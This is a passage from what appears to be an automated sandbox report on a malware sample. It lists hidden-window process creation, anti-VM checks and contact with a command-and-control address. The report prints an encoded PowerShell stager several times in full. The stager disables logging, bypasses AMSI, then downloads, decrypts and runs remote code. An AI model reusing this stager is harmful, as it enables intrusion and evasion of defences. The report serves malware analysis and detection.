CgAJwBTAHkAcwB0AGUAbQAuAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBBAHUAdABvAG0AYQB0AGkAbwBuAC4AQQBtAHMAaQAnACsAJwBVAHQAaQBsAHMAJwApADsAJABSAEUARgAuAEcARQBUAEYASQBlAGwARAAoACcAYQBtAHMAaQBJAG4AaQB0AEYAJwArACcAYQBpAGwAZQBkACcALAAnAE4AbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApAC4AUwBlAFQAVgBBAEwAVQBFACgAJABuAHUAbABMACwAJAB0AFIAVQBFACkAOwB9ADsAWwBTAHkAUwBUAEUATQAuAE4ARQBUAC4AUwBlAFIAdgBpAEMARQBQAE8AaQBuAFQATQBBAG4AYQBHAEUAcgBdADoAOgBFAFgAcABlAGMAVAAxADAAMABDAE8ATgB0AGkATgBVAGUAPQAwADsAJABCAGEAMAA9AE4ARQB3AC0ATwBiAGoAZQBDAHQAIABTAHkAcwB0AGUAbQAuAE4ARQB0AC4AVwBFAEIAQwBMAEkAZQBOAFQAOwAkAHUAPQAnAE0AbwB6AGkAbABsAGEALwA1AC4AMAAgACgAVwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxADsAIABXAE8AVwA2ADQAOwAgAFQAcgBpAGQAZQBuAHQALwA3AC4AMAA7ACAAcgB2ADoAMQAxAC4AMAApACAAbABpAGsAZQAgAEcAZQBjAGsAbwAnADsAJABzAGUAcgA9ACQAKABbAFQARQB4AFQALgBFAE4AQwBvAEQASQBOAGcAXQA6ADoAVQBuAEkAQwBvAGQAZQAuAEcARQB0AFMAVAByAEkATgBHACgAWwBDAE8ATgB2AGUAcgB0AF0AOgA6AEYAcgBvAE0AQgBhAHMAZQA2ADQAUwBUAFIAaQBOAGcAKAAnAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAawBBAE0AdwBBAHUAQQBEAEUAQQBNAFEAQQAzAEEAQwA0AEEATQBnAEEAdwBBAEQAZwBBAEwAZwBBAHgAQQBEAFEAQQBPAEEAQQA2AEEARABjAEEATwBBAEEAdwBBAEQAQQBBACcAKQApACkAOwAkAHQAPQAnAC8AbgBlAHcAcwAuAHAAaABwACcAOwAkAGIAQQAwAC4ASABlAEEARABlAFIAcwAuAEEARABEACgAJwBVAHMAZQByAC0AQQBnAGUAbgB0ACcALAAkAHUAKQA7ACQAQgBhADAALgBQAHIATwBYAHkAPQBbAFMAWQBTAFQARQBNAC4ATgBFAHQALgBXAEUAYgBSAEUAUQB1AGUAUwBUAF0AOgA6AEQAZQBmAGEAdQBMAHQAVwBlAEIAUAByAE8AeAB5ADsAJABiAGEAMAAuAFAAcgBvAFgAWQAuAEMAUgBlAGQARQBuAFQASQBBAGwAcwAgAD0AIABbAFMAeQBTAHQAZQBtAC4ATgBlAHQALgBDAHIAZQBEAGUAbgBUAEkAYQBsAEMAYQBDAGgARQBdADoAOgBEAGUAZgBhAFUATAB0AE4AZQBUAHcATwBSAEsAQwByAEUAZABFAG4AdABJAEEAbABTADsAJABTAGMAcgBpAHAAdAA6AFAAcgBvAHgAeQAgAD0AIAAkAGIAYQAwAC4AUAByAG8AeAB5ADsAJABLAD0AWwBTAHkAUwBUAGUAbQAuAFQARQBYAHQALgBFAE4AQwBvAEQASQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAFQAQgBZAHQARQBzACgAJwBkADQALAAwAGcAawBAAFsAUAAqACEALwBmAHMAdABhADoAYgA3AFEAQgBoAGwAVQBEAHIANgB4AEUAXQAzAF8AJwApADsAJABSAD0AewAkAEQALAAkAEsAPQAkAEEAUgBnAHMAOwAkAFMAPQAwAC4ALgAyADUANQA7ADAALgAuADIANQA1AHwAJQB7ACQASgA9ACgAJABKACsAJABTAFsAJABfAF0AKwAkAEsAWwAkAF8AJQAkAEsALgBDAE8AdQBuAFQAXQApACUAMgA1ADYAOwAkAFMAWwAkAF8AXQAsACQAUwBbACQASgBdAD0AJABTAFsAJABKAF0ALAAkAFMAWwAkAF8AXQB9ADsAJABEAHwAJQB7ACQASQA9ACgAJABJACsAMQApACUAMgA1ADYAOwAkAEgAPQAoACQASAArACQAUwBbACQASQBdACkAJQAyADUANgA7ACQAUwBbACQASQBdACwAJABTAFsAJABIAF0APQAkAFMAWwAkAEgAXQAsACQAUwBbACQASQBdADsAJABfAC0AQgB4AG8AcgAkAFMAWwAoACQAUwBbACQASQBdACsAJABTAFsAJABIAF0AKQAlADIANQA2AF0AfQB9ADsAJABiAGEAMAAuAEgAZQBhAEQARQByAHMALgBBAEQAZAAoACIAQwBvAG8AawBpAGUAIgAsACIAcQBHAFYAVABTAHkAPQBUAEoAWAB1AFgAVgBBAHUAZQBwADQAYgBuADcANABFAEwATwAzAFcAMgBUAEoAcABzAFIAZwA9ACIAKQA7ACQAZABhAHQAQQA9ACQAYgBhADAALgBEAE8AVwBOAGwAbwBBAGQARABBAFQAQQAoACQAUwBFAFIAKwAkAFQAKQA7ACQAaQBWAD0AJABEAEEAVABBAFsAMAAuAC4AMwBdADsAJABEAGEAVABBAD0AJABEAEEAVABBAFsANAAuAC4AJABEAEEAVABBAC4AbABlAG4AZwB0AEgAXQA7AC0ASgBvAEkATgBbAEMAaABBAFIAWwBdAF0AKAAmACAAJABSACAAJABkAEEAVABBACAAKAAkAEkAVgArACQASwApACkAfABJAEUAWAA=

A process created a hidden window (1 event)

Time & API	Arguments	Status	Return	Repeated
ShellExecuteExW Aug. 12, 2024, 9:41 a.m.	show_type: 0 filepath_r: powershell parameters: -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBFAHIAUwBpAG8ATgBUAGEAQgBMAGUALgBQAFMAVgBFAHIAUwBpAG8ATgAuAE0AYQBqAG8AUgAgAC0ARwBlACAAMwApAHsAJABDADYANwA9AFsAcgBFAEYAXQAuAEEAcwBTAGUATQBiAEwAWQAuAEcAZQBUAFQAWQBQAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBVAHQAaQBsAHMAJwApAC4AIgBHAEUAVABGAEkARQBgAEwAZAAiACgAJwBjAGEAYwBoAGUAZABHAHIAbwB1AHAAUABvAGwAaQBjAHkAUwBlAHQAdABpAG4AZwBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApADsASQBmACgAJABjADYANwApAHsAJAA2AGMANAA9ACQAYwA2ADcALgBHAGUAVABWAEEATAB1AEUAKAAkAG4AVQBMAGwAKQA7AEkAZgAoACQANgBjADQAWwAnAFMAYwByAGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZwBnAGkAbgBnACcAXQApAHsAJAA2AEMANABbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0APQAwADsAJAA2AGMANABbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsASQBuAHYAbwBjAGEAdABpAG8AbgBMAG8AZwBnAGkAbgBnACcAXQA9ADAAfQAkAFYAQQBsAD0AWwBDAE8AbABsAEUAYwB0AEkAbwBOAHMALgBHAGUAbgBFAFIASQBjAC4ARABJAEMAVABpAG8AbgBBAHIAWQBbAHMAVABSAGkATgBnACwAUwB5AFMAdABFAG0ALgBPAGIAagBlAGMAVABdAF0AOgA6AE4ARQB3ACgAKQA7ACQAdgBhAEwALgBBAGQAZAAoACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwAsADAAKQA7ACQAVgBhAEwALgBBAGQAZAAoACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgBsAG8AYwBrAEkAbgB2AG8AYwBhAHQAaQBvAG4ATABvAGcAZwBpAG4AZwAnACwAMAApADsAJAA2AGMANABbACcASABLAEUAWQBfAEwATwBDAEEATABfAE0AQQBDAEgASQBOAEUAXABTAG8AZgB0AHcAYQByAGUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABQAG8AdwBlAHIAUwBoAGUAbABsAFwAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAD0AJAB2AGEATAB9AEUAbABTAGUAewBbAFMAQwBSAEkAcABUAEIAbABvAGMASwBdAC4AIgBHAEUAVABGAEkARQBgAGwARAAiACgAJwBzAGkAZwBuAGEAdAB1AHIAZQBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApAC4AUwBlAHQAVgBhAEwAdQBFACgAJABOAFUAbABMACwAKABOAGUAdwAtAE8AQgBqAEUAYwB0ACAAQwBvAEwATABFAEMAdABpAE8AbgBTAC4ARwBFAG4AZQBSAGkAQwAuAEgAYQBTAEgAUwBFAHQAWwBzAFQAcgBpAG4ARwBdACkAKQB9ACQAUgBFAGYAPQBbAFIARQBmAF0ALgBBAHMAUwBFAG0AQgBMAFkALgBHAEUAdABUAFkAUABFACgAJwBTAHkAcwB0AGUAbQAuAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBBAHUAdABvAG0AYQB0AGkAbwBuAC4AQQBtAHMAaQAnACsAJwBVAHQAaQBsAHMAJwApADsAJABSAEUARgAuAEcARQBUAEYASQBlAGwARAAoACcAYQBtAHMAaQBJAG4AaQB0AEYAJwArACcAYQBpAGwAZQBkACcALAAnAE4AbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApAC4AUwBlAFQAVgBBAEwAVQBFACgAJABuAHUAbABMACwAJAB0AFIAVQBFACkAOwB9ADsAWwBTAHkAUwBUAEUATQAuAE4ARQBUAC4AUwBlAFIAdgBpAEMARQBQAE8AaQBuAFQATQBBAG4AYQBHAEUAcgBdADoAOgBFAFgAcABlAGMAVAAxADAAMABDAE8ATgB0AGkATgBVAGUAPQAwADsAJABCAGEAMAA9AE4ARQB3AC0ATwBiAGoAZQBDAHQAIABTAHkAcwB0AGUAbQAuAE4ARQB0AC4AVwBFAEIAQwBMAEkAZQBOAFQAOwAkAHUAPQAnAE0AbwB6AGkAbABsAGEALwA1AC4AMAAgACgAVwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxADsAIABXAE8AVwA2ADQAOwAgAFQAcgBpAGQAZQBuAHQALwA3AC4AMAA7ACAAcgB2ADoAMQAxAC4AMAApACAAbABpAGsAZQAgAEcAZQBjAGsAbwAnADsAJABzAGUAcgA9ACQAKABbAFQARQB4AFQALgBFAE4AQwBvAEQASQBOAGcAXQA6ADoAVQBuAEkAQwBvAGQAZQAuAEcARQB0AFMAVAByAEkATgBHACgAWwBDAE8ATgB2AGUAcgB0AF0AOgA6AEYAcgBvAE0AQgBhAHMAZQA2ADQAUwBUAFIAaQBOAGcAKAAnAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAawBBAE0AdwBBAHUAQQBEAEUAQQBNAFEAQQAzAEEAQwA0AEEATQBnAEEAdwBBAEQAZwBBAEwAZwBBAHgAQQBEAFEAQQBPAEEAQQA2AEEARABjAEEATwBBAEEAdwBBAEQAQQBBACcAKQApACkAOwAkAHQAPQAnAC8AbgBlAHcAcwAuAHAAaABwACcAOwAkAGIAQQAwAC4ASABlAEEARABlAFIAcwAuAEEARABEACgAJwBVAHMAZQByAC0AQQBnAGUAbgB0ACcALAAkAHUAKQA7ACQAQgBhADAALgBQAHIATwBYAHkAPQBbAFMAWQBTAFQARQBNAC4ATgBFAHQALgBXAEUAYgBSAEUAUQB1AGUAUwBUAF0AOgA6AEQAZQBmAGEAdQBMAHQAVwBlAEIAUAByAE8AeAB5ADsAJABiAGEAMAAuAFAAcgBvAFgAWQAuAEMAUgBlAGQARQBuAFQASQBBAGwAcwAgAD0AIABbAFMAeQBTAHQAZQBtAC4ATgBlAHQALgBDAHIAZQBEAGUAbgBUAEkAYQBsAEMAYQBDAGgARQBdADoAOgBEAGUAZgBhAFUATAB0AE4AZQBUAHcATwBSAEsAQwByAEUAZABFAG4AdABJAEEAbABTADsAJABTAGMAcgBpAHAAdAA6AFAAcgBvAHgAeQAgAD0AIAAkAGIAYQAwAC4AUAByAG8AeAB5ADsAJABLAD0AWwBTAHkAUwBUAGUAbQAuAFQARQBYAHQALgBFAE4AQwBvAEQASQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAFQAQgBZAHQARQBzACgAJwBkADQALAAwAGcAawBAAFsAUAAqACEALwBmAHMAdABhADoAYgA3AFEAQgBoAGwAVQBEAHIANgB4AEUAXQAzAF8AJwApADsAJABSAD0AewAkAEQALAAkAEsAPQAkAEEAUgBnAHMAOwAkAFMAPQAwAC4ALgAyADUANQA7ADAALgAuADIANQA1AHwAJQB7ACQASgA9ACgAJABKACsAJABTAFsAJABfAF0AKwAkAEsAWwAkAF8AJQAkAEsALgBDAE8AdQBuAFQAXQApACUAMgA1ADYAOwAkAFMAWwAkAF8AXQAsACQAUwBbACQASgBdAD0AJABTAFsAJABKAF0ALAAkAFMAWwAkAF8AXQB9ADsAJABEAHwAJQB7ACQASQA9ACgAJABJACsAMQApACUAMgA1ADYAOwAkAEgAPQAoACQASAArACQAUwBbACQASQBdACkAJQAyADUANgA7ACQAUwBbACQASQBdACwAJABTAFsAJABIAF0APQAkAFMAWwAkAEgAXQAsACQAUwBbACQASQBdADsAJABfAC0AQgB4AG8AcgAkAFMAWwAoACQAUwBbACQASQBdACsAJABTAFsAJABIAF0AKQAlADIANQA2AF0AfQB9ADsAJABiAGEAMAAuAEgAZQBhAEQARQByAHMALgBBAEQAZAAoACIAQwBvAG8AawBpAGUAIgAsACIAcQBHAFYAVABTAHkAPQBUAEoAWAB1AFgAVgBBAHUAZQBwADQAYgBuADcANABFAEwATwAzAFcAMgBUAEoAcABzAFIAZwA9ACIAKQA7ACQAZABhAHQAQQA9ACQAYgBhADAALgBEAE8AVwBOAGwAbwBBAGQARABBAFQAQQAoACQAUwBFAFIAKwAkAFQAKQA7ACQAaQBWAD0AJABEAEEAVABBAFsAMAAuAC4AMwBdADsAJABEAGEAVABBAD0AJABEAEEAVABBAFsANAAuAC4AJABEAEEAVABBAC4AbABlAG4AZwB0AEgAXQA7AC0ASgBvAEkATgBbAEMAaABBAFIAWwBdAF0AKAAmACAAJABSACAAJABkAEEAVABBACAAKAAkAEkAVgArACQASwApACkAfABJAEUAWAA= filepath: powershell	1	1	0

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses Aug. 12, 2024, 9:41 a.m.	flags: 15 family: 0		111	0

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW Aug. 12, 2024, 9:41 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Communicates with host for which no DNS query was performed (1 event)

host

193.117.208.148

One or more non-whitelisted processes were created (2 events)

parent_process	wscript.exe				martian_process	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBFAHIAUwBpAG8ATgBUAGEAQgBMAGUALgBQAFMAVgBFAHIAUwBpAG8ATgAuAE0AYQBqAG8AUgAgAC0ARwBlACAAMwApAHsAJABDADYANwA9AFsAcgBFAEYAXQAuAEEAcwBTAGUATQBiAEwAWQAuAEcAZQBUAFQAWQBQAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBVAHQAaQBsAHMAJwApAC4AIgBHAEUAVABGAEkARQBgAEwAZAAiACgAJwBjAGEAYwBoAGUAZABHAHIAbwB1AHAAUABvAGwAaQBjAHkAUwBlAHQAdABpAG4AZwBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApADsASQBmACgAJABjADYANwApAHsAJAA2AGMANAA9ACQAYwA2ADcALgBHAGUAVABWAEEATAB1AEUAKAAkAG4AVQBMAGwAKQA7AEkAZgAoACQANgBjADQAWwAnAFMAYwByAGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZwBnAGkAbgBnACcAXQApAHsAJAA2AEMANABbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0APQAwADsAJAA2AGMANABbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsASQBuAHYAbwBjAGEAdABpAG8AbgBMAG8AZwBnAGkAbgBnACcAXQA9ADAAfQAkAFYAQQBsAD0AWwBDAE8AbABsAEUAYwB0AEkAbwBOAHMALgBHAGUAbgBFAFIASQBjAC4ARABJAEMAVABpAG8AbgBBAHIAWQBbAHMAVABSAGkATgBnACwAUwB5AFMAdABFAG0ALgBPAGIAagBlAGMAVABdAF0AOgA6AE4ARQB3ACgAKQA7ACQAdgBhAEwALgBBAGQAZAAoACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwAsADAAKQA7ACQAVgBhAEwALgBBAGQAZAAoACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgBsAG8AYwBrAEkAbgB2AG8AYwBhAHQAaQBvAG4ATABvAGcAZwBpAG4AZwAnACwAMAApADsAJAA2AGMANABbACcASABLAEUAWQBfAEwATwBDAEEATABfAE0AQQBDAEgASQBOAEUAXABTAG8AZgB0AHcAYQByAGUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABQAG8AdwBlAHIAUwBoAGUAbABsAFwAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAD0AJAB2AGEATAB9AEUAbABTAGUAewBbAFMAQwBSAEkAcABUAEIAbABvAGMASwBdAC4AIgBHAEUAVABGAEkARQBgAGwARAAiACgAJwBzAGkAZwBuAGEAdAB1AHIAZQBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApAC4AUwBlAHQAVgBhAEwAdQBFACgAJABOAFUAbABMACwAKABOAGUAdwAtAE8AQgBqAEUAYwB0ACAAQwBvAEwATABFAEMAdABpAE8AbgBTAC4ARwBFAG4AZQBSAGkAQwAuAEgAYQBTAEgAUwBFAHQAWwBzAFQAcgBpAG4ARwBdACkAKQB9ACQAUgBFAGYAPQBbAFIARQBmAF0ALgBBAHMAUwBFAG0AQgBMAFkALgBHAEUAdABUAFkAUABFACgAJwBTAHkAcwB0AGUAbQAuAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBBAHUAdABvAG0AYQB0AGkAbwBuAC4AQQBtAHMAaQAnACsAJwBVAHQAaQBsAHMAJwApADsAJABSAEUARgAuAEcARQBUAEYASQBlAGwARAAoACcAYQBtAHMAaQBJAG4AaQB0AEYAJwArACcAYQBpAGwAZQBkACcALAAnAE4AbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApAC4AUwBlAFQAVgBBAEwAVQBFACgAJABuAHUAbABMACwAJAB0AFIAVQBFACkAOwB9ADsAWwBTAHkAUwBUAEUATQAuAE4ARQBUAC4AUwBlAFIAdgBpAEMARQBQAE8AaQBuAFQATQBBAG4AYQBHAEUAcgBdADoAOgBFAFgAcABlAGMAVAAxADAAMABDAE8ATgB0AGkATgBVAGUAPQAwADsAJABCAGEAMAA9AE4ARQB3AC0ATwBiAGoAZQBDAHQAIABTAHkAcwB0AGUAbQAuAE4ARQB0AC4AVwBFAEIAQwBMAEkAZQBOAFQAOwAkAHUAPQAnAE0AbwB6AGkAbABsAGEALwA1AC4AMAAgACgAVwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxADsAIABXAE8AVwA2ADQAOwAgAFQAcgBpAGQAZQBuAHQALwA3AC4AMAA7ACAAcgB2ADoAMQAxAC4AMAApACAAbABpAGsAZQAgAEcAZQBjAGsAbwAnADsAJABzAGUAcgA9ACQAKABbAFQARQB4AFQALgBFAE4AQwBvAEQASQBOAGcAXQA6ADoAVQBuAEkAQwBvAGQAZQAuAEcARQB0AFMAVAByAEkATgBHACgAWwBDAE8ATgB2AGUAcgB0AF0AOgA6AEYAcgBvAE0AQgBhAHMAZQA2ADQAUwBUAFIAaQBOAGcAKAAnAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAawBBAE0AdwBBAHUAQQBEAEUAQQBNAFEAQQAzAEEAQwA0AEEATQBnAEEAdwBBAEQAZwBBAEwAZwBBAHgAQQBEAFEAQQBPAEEAQQA2AEEARABjAEEATwBBAEEAdwBBAEQAQQBBACcAKQApACkAOwAkAHQAPQAnAC8AbgBlAHcAcwAuAHAAaABwACcAOwAkAGIAQQAwAC4ASABlAEEARABlAFIAcwAuAEEARABEACgAJwBVAHMAZQByAC0AQQBnAGUAbgB0ACcALAAkAHUAKQA7ACQAQgBhADAALgBQAHIATwBYAHkAPQBbAFMAWQBTAFQARQBNAC4ATgBFAHQALgBXAEUAYgBSAEUAUQB1AGUAUwBUAF0AOgA6AEQAZQBmAGEAdQBMAHQAVwBlAEIAUAByAE8AeAB5ADsAJABiAGEAMAAuAFAAcgBvAFgAWQAuAEMAUgBlAGQARQBuAFQASQBBAGwAcwAgAD0AIABbAFMAeQBTAHQAZQBtAC4ATgBlAHQALgBDAHIAZQBEAGUAbgBUAEkAYQBsAEMAYQBDAGgARQBdADoAOgBEAGUAZgBhAFUATAB0AE4AZQBUAHcATwBSAEsAQwByAEUAZABFAG4AdABJAEEAbABTADsAJABTAGMAcgBpAHAAdAA6AFAAcgBvAHgAeQAgAD0AIAAkAGIAYQAwAC4AUAByAG8AeAB5ADsAJABLAD0AWwBTAHkAUwBUAGUAbQAuAFQARQBYAHQALgBFAE4AQwBvAEQASQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAFQAQgBZAHQARQBzACgAJwBkADQALAAwAGcAawBAAFsAUAAqACEALwBmAHMAdABhADoAYgA3AFEAQgBoAGwAVQBEAHIANgB4AEUAXQAzAF8AJwApADsAJABSAD0AewAkAEQALAAkAEsAPQAkAEEAUgBnAHMAOwAkAFMAPQAwAC4ALgAyADUANQA7ADAALgAuADIANQA1AHwAJQB7ACQASgA9ACgAJABKACsAJABTAFsAJABfAF0AKwAkAEsAWwAkAF8AJQAkAEsALgBDAE8AdQBuAFQAXQApACUAMgA1ADYAOwAkAFMAWwAkAF8AXQAsACQAUwBbACQASgBdAD0AJABTAFsAJABKAF0ALAAkAFMAWwAkAF8AXQB9ADsAJABEAHwAJQB7ACQASQA9ACgAJABJACsAMQApACUAMgA1ADYAOwAkAEgAPQAoACQASAArACQAUwBbACQASQBdACkAJQAyADUANgA7ACQAUwBbACQASQBdACwAJABTAFsAJABIAF0APQAkAFMAWwAkAEgAXQAsACQAUwBbACQASQBdADsAJABfAC0AQgB4AG8AcgAkAFMAWwAoACQAUwBbACQASQBdACsAJABTAFsAJABIAF0AKQAlADIANQA2AF0AfQB9ADsAJABiAGEAMAAuAEgAZQBhAEQARQByAHMALgBBAEQAZAAoACIAQwBvAG8AawBpAGUAIgAsACIAcQBHAFYAVABTAHkAPQBUAEoAWAB1AFgAVgBBAHUAZQBwADQAYgBuADcANABFAEwATwAzAFcAMgBUAEoAcABzAFIAZwA9ACIAKQA7ACQAZABhAHQAQQA9ACQAYgBhADAALgBEAE8AVwBOAGwAbwBBAGQARABBAFQAQQAoACQAUwBFAFIAKwAkAFQAKQA7ACQAaQBWAD0AJABEAEEAVABBAFsAMAAuAC4AMwBdADsAJABEAGEAVABBAD0AJABEAEEAVABBAFsANAAuAC4AJABEAEEAVABBAC4AbABlAG4AZwB0AEgAXQA7AC0ASgBvAEkATgBbAEMAaABBAFIAWwBdAF0AKAAmACAAJABSACAAJABkAEEAVABBACAAKAAkAEkAVgArACQASwApACkAfABJAEUAWAA=
parent_process	wscript.exe				martian_process	powershell -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBFAHIAUwBpAG8ATgBUAGEAQgBMAGUALgBQAFMAVgBFAHIAUwBpAG8ATgAuAE0AYQBqAG8AUgAgAC0ARwBlACAAMwApAHsAJABDADYANwA9AFsAcgBFAEYAXQAuAEEAcwBTAGUATQBiAEwAWQAuAEcAZQBUAFQAWQBQAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBVAHQAaQBsAHMAJwApAC4AIgBHAEUAVABGAEkARQBgAEwAZAAiACgAJwBjAGEAYwBoAGUAZABHAHIAbwB1AHAAUABvAGwAaQBjAHkAUwBlAHQAdABpAG4AZwBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApADsASQBmACgAJABjADYANwApAHsAJAA2AGMANAA9ACQAYwA2ADcALgBHAGUAVABWAEEATAB1AEUAKAAkAG4AVQBMAGwAKQA7AEkAZgAoACQANgBjADQAWwAnAFMAYwByAGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZwBnAGkAbgBnACcAXQApAHsAJAA2AEMANABbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0APQAwADsAJAA2AGMANABbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsASQBuAHYAbwBjAGEAdABpAG8AbgBMAG8AZwBnAGkAbgBnACcAXQA9ADAAfQAkAFYAQQBsAD0AWwBDAE8AbABsAEUAYwB0AEkAbwBOAHMALgBHAGUAbgBFAFIASQBjAC4ARABJAEMAVABpAG8AbgBBAHIAWQBbAHMAVABSAGkATgBnACwAUwB5AFMAdABFAG0ALgBPAGIAagBlAGMAVABdAF0AOgA6AE4ARQB3ACgAKQA7ACQAdgBhAEwALgBBAGQAZAAoACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwAsADAAKQA7ACQAVgBhAEwALgBBAGQAZAAoACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgBsAG8AYwBrAEkAbgB2AG8AYwBhAHQAaQBvAG4ATABvAGcAZwBpAG4AZwAnACwAMAApADsAJAA2AGMANABbACcASABLAEUAWQBfAEwATwBDAEEATABfAE0AQQBDAEgASQBOAEUAXABTAG8AZgB0AHcAYQByAGUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABQAG8AdwBlAHIAUwBoAGUAbABsAFwAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAD0AJAB2AGEATAB9AEUAbABTAGUAewBbAFMAQwBSAEkAcABUAEIAbABvAGMASwBdAC4AIgBHAEUAVABGAEkARQBgAGwARAAiACgAJwBzAGkAZwBuAGEAdAB1AHIAZQBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApAC4AUwBlAHQAVgBhAEwAdQBFACgAJABOAFUAbABMACwAKABOAGUAdwAtAE8AQgBqAEUAYwB0ACAAQwBvAEwATABFAEMAdABpAE8AbgBTAC4ARwBFAG4AZQBSAGkAQwAuAEgAYQBTAEgAUwBFAHQAWwBzAFQAcgBpAG4ARwBdACkAKQB9ACQAUgBFAGYAPQBbAFIARQBmAF0ALgBBAHMAUwBFAG0AQgBMAFkALgBHAEUAdABUAFkAUABFACgAJwBTAHkAcwB0AGUAbQAuAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBBAHUAdABvAG0AYQB0AGkAbwBuAC4AQQBtAHMAaQAnACsAJwBVAHQAaQBsAHMAJwApADsAJABSAEUARgAuAEcARQBUAEYASQBlAGwARAAoACcAYQBtAHMAaQBJAG4AaQB0AEYAJwArACcAYQBpAGwAZQBkACcALAAnAE4AbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApAC4AUwBlAFQAVgBBAEwAVQBFACgAJABuAHUAbABMACwAJAB0AFIAVQBFACkAOwB9ADsAWwBTAHkAUwBUAEUATQAuAE4ARQBUAC4AUwBlAFIAdgBpAEMARQBQAE8AaQBuAFQATQBBAG4AYQBHAEUAcgBdADoAOgBFAFgAcABlAGMAVAAxADAAMABDAE8